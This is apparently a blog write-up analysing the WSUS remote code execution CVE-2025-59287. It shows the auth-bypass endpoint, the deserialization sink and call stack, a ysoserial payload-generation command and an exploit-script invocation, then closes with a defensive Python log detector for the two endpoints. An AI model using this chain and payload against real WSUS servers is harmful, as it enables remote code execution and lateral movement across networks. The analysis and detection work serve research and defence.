CVE-2025-59287 WSUS RCE

This vulnerability stems from an authentication bypass (obtaining a cookie from the SimpleAuthWebService/SimpleAuth.asmx endpoint) combined with an unsafe deserialization issue in /ReportingWebService/ReportingWebService.asmx, which together allow an attacker to execute code remotely.

  • Acknowledgements

    1. CVE-2025-59287-UNAUTH
    2. poc
  • What is WSUS

    WSUS (Windows Server Update Services) is a Microsoft tool that lets IT administrators manage and distribute updates for Windows systems. WSUS clients communicate with the WSUS server over the web to receive updates and stay secure.

    For lateral movement inside an internal network, controlling WSUS allows malicious files to be pushed to many machines at once, expanding the foothold -.)

  • Setup

    Official documentation

  • Analysis

    Deserialization

    // Decompiled deserialization sink (Microsoft.UpdateServices.Internal.SoapUtilities):
    // a SoapFormatter with a custom binder configured with the
    // "Microsoft.UpdateServices.Administration" assembly name deserializes the raw bytes.
    public static object DeserializeObject(byte[] bytes)
    {
        SoapFormatter soapFormatter = new SoapFormatter();
        soapFormatter.Binder = new WSUSDeserializationBinder("Microsoft.UpdateServices.Administration");
        if (bytes == null)
        {
            throw new ArgumentNullException("bytes");
        }
        MemoryStream memoryStream = new MemoryStream(bytes);
        return soapFormatter.Deserialize(memoryStream);
    }

    I will stop here; the referenced article is very detailed, so just follow it and step through in the debugger yourself.

    Call stack trace (who calls the sink)

    Microsoft.UpdateServices.Internal.SoapUtilities.DeserializeObject(byte[]) : object @06000158
    	Used By
    		Microsoft.UpdateServices.Internal.BaseApi.BaseEvent.ConvertXmlToObject(string) : object @060003B8
    			Used By
    				Microsoft.UpdateServices.Internal.BaseApi.SubscriptionEvent.PopulateSubscriptionEventProperties() : void @06000552
    					Overridden By
    					Used By
    						Microsoft.UpdateServices.Internal.BaseApi.SubscriptionEvent.SubscriptionEvent(EventHistoryTableRow) : void @06000544
    							Used By
    								Microsoft.UpdateServices.Internal.BaseApi.SubscriptionEvent.GetEventHistory(DateTime, DateTime, UpdateServer) : SubscriptionEventCollection @0600054A

  • Verification

    ysoserial.exe -f BinaryFormatter -g TextFormattingRunProperties -o base64 -c "echo pwned > C:\Windows\Temp\PWNED.txt"

    Replace the selected region (screenshot not reproduced here)

    python 1.py http://192.168.116.136:8530

  • Notes

    1. Code runs with NETWORK SERVICE privileges.
    2. Triggering is delayed: the call chain above ends in SubscriptionEvent.GetEventHistory, i.e. the deserialization sink is reached when the stored event history is read.
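From a defender's side, the two endpoints named in this post are the thing to watch in the WSUS IIS logs, and because the trigger is delayed, a cookie fetch from SimpleAuth.asmx followed by a post to ReportingWebService.asmx from the same client is a better signal than either request alone. The following is an added example (not code from the post or from Microsoft); the W3C log lines are constructed, and the assumption that legitimate clients identify with a User-Agent starting "Windows-Update-Agent" is a heuristic you should adjust to your own baseline.

```python
from collections import defaultdict

# Constructed W3C IIS log excerpt (not real traffic); WSUS listens on 8530 here.
SAMPLE_LOG = """\
#Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) sc-status
2025-10-24 10:00:01 10.0.0.5 POST /SimpleAuthWebService/SimpleAuth.asmx - 8530 - 10.0.0.77 Windows-Update-Agent 200
2025-10-24 10:00:02 10.0.0.5 POST /ReportingWebService/ReportingWebService.asmx - 8530 - 10.0.0.77 Windows-Update-Agent 200
2025-10-24 10:05:10 10.0.0.5 POST /SimpleAuthWebService/SimpleAuth.asmx - 8530 - 203.0.113.9 python-requests/2.31 200
2025-10-24 10:05:11 10.0.0.5 POST /ReportingWebService/ReportingWebService.asmx - 8530 - 203.0.113.9 python-requests/2.31 500
2025-10-24 10:06:00 10.0.0.5 GET /ClientWebService/client.asmx - 8530 - 10.0.0.78 Windows-Update-Agent 200
"""

AUTH_STEM = "/simpleauthwebservice/simpleauth.asmx"
REPORT_STEM = "/reportingwebservice/reportingwebservice.asmx"
WATCHED = {AUTH_STEM, REPORT_STEM}
# Assumption: real update agents carry this User-Agent prefix; tune to your environment.
EXPECTED_UA_PREFIX = "Windows-Update-Agent"


def parse_iis(text):
    """Yield one dict per data line, using the #Fields: header for column names."""
    fields = None
    for line in text.splitlines():
        if line.startswith("#Fields:"):
            fields = line.split()[1:]
            continue
        if not line or line.startswith("#") or fields is None:
            continue
        values = line.split()
        if len(values) == len(fields):
            yield dict(zip(fields, values))


def find_suspicious(text):
    """Return {client_ip: [(time, uri, user_agent, status), ...]} for clients that
    touched both watched endpoints with a User-Agent that is not an update agent."""
    per_client = defaultdict(list)
    for rec in parse_iis(text):
        if rec["cs-uri-stem"].lower() in WATCHED:
            per_client[rec["c-ip"]].append(rec)
    hits = {}
    for ip, recs in per_client.items():
        stems = {r["cs-uri-stem"].lower() for r in recs}
        odd_ua = any(not r["cs(User-Agent)"].startswith(EXPECTED_UA_PREFIX) for r in recs)
        if odd_ua and AUTH_STEM in stems and REPORT_STEM in stems:
            hits[ip] = [(r["time"], r["cs-uri-stem"], r["cs(User-Agent)"], r["sc-status"]) for r in recs]
    return hits


if __name__ == "__main__":
    for ip, events in find_suspicious(SAMPLE_LOG).items():
        print(ip, events)
```

Run it over a real log export the same way; on the constructed input only 203.0.113.9 is reported, while the agent on 10.0.0.77 that hit both endpoints is not.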